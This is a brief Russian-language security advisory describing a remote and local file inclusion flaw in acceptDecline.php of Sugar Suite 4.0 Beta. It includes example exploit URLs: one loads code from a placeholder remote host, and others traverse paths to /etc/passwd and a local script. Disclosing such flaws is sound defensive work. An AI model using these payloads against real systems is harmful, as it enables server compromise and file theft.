Программа: Sugar Suite 4.0 Beta и более ранние версии
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "beanFiles[1]" в сценарии "acceptDecline.php". Удаленный
пользователь может с помощью специально сформированного URL выполнить
произвольные команды на системе с привилегиями Web сервера. Для успешной
эксплуатации уязвимости опция "register_globals" is должна быть включена.
Примеры:
http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]= http://[remote_location]/index.html&beanList[1]=1&module=1
http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=
../../../../../../../../etc/passwd&beanList[1]=1&module=1
http://[target]/[path_to_sugar]/acceptDecline.php?beanFiles[1]=
../../../../../../../../../script.php&beanList[1]=1&module=1
